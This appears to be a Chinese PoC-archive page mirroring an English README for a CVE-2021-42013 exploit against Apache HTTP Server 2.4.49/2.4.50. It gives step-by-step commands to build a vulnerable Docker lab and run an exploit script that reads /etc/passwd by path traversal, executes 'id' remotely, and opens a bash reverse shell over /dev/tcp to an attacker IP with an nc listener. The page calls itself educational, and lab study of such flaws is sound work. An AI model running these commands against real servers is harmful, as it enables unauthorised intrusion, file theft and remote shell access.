关联漏洞
标题:
Apache HTTP Server 安全漏洞
(CVE-2021-42013)
描述:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 Apache HTTP Server 存在安全漏洞,该漏洞源于发现 Apache HTTP Server 2.4.50 版本中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别
介绍
<h1 style="font-size:10vw" align="left">CVE-2021-42013 - Apache 2.4.50 Path Traversal & Remote Code Execution (RCE)</h1>
<img src="https://img.shields.io/badge/CVSS:3.1%20Score%20-9.8 CRITICAL-red"> <img src="https://img.shields.io/badge/Maintained%3F-Yes-96c40f">
******
⚠️ *For educational and authorized security research purposes only*
## Original Exploit Authors
Very grateful to the original PoC author [Walnut Security Services Pvt. Ltd](https://github.com/walnutsecurity)
## Description
An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.
******
## Step Guides
1. First, clone the repository
```bash
git clone https://github.com/asepsaepdin/CVE-2021-42013.git
```
2. Change directory
```bash
cd CVE-2021-42013
```
3. Build vuln container
```bash
docker build -t CVE-2021-42013 .
```
5. Run ephemeral container
```bash
docker run --rm -it --name CVE-2021-42013 CVE-2021-42013
```
6. Check container ip address
```bash
docker inspect CVE-2021-42013 | grep "IPAddress"
```
7. Give executable permission to script
```bash
chmod +x cve-2021-42013.sh
```
8. To test for and confirm path traversal, a valid directory needs to be discovered which in this case is configured as /icons. So, executing the following command would trigger path traversal vulnerability and print the contents of /etc/passwd:
```bash
./cve-2021-42013.sh 172.17.0.3/icons /etc/passwd
```
9. To test for and confirm remote code execution, CGI should be configured and enabled which in this case is true. So, executing the following command would trigger remote code execution and print the output of the id command:
```bash
./cve-2021-42013.sh 172.17.0.3 /bin/bash id
```
10. From an attacker perspective, remote code execution is critical to get access to an interactive shell. So, executing the following command would trigger a conventional reverse shell over tcp based on bash to attacker’s system on port 4444/tcp:
```bash
./cve-2021-42013.sh 172.17.0.4 /bin/bash 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'
```
```bash
nc -nlvp 4444
```
******
## Credits
- https://github.com/walnutsecurity/cve-2021-42013
- https://nvd.nist.gov/vuln/detail/CVE-2021-42013
- https://www.exploit-db.com/docs/50552
- https://www.exploit-db.com/exploits/50406
文件快照
[4.0K] /data/pocs/c4fe5570eadc6ea81e0de16a6bcbdce0f0274091
├── [ 337] cve-2021-42013.sh
├── [ 416] Dockerfile
├── [ 18K] httpd.conf
└── [2.7K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。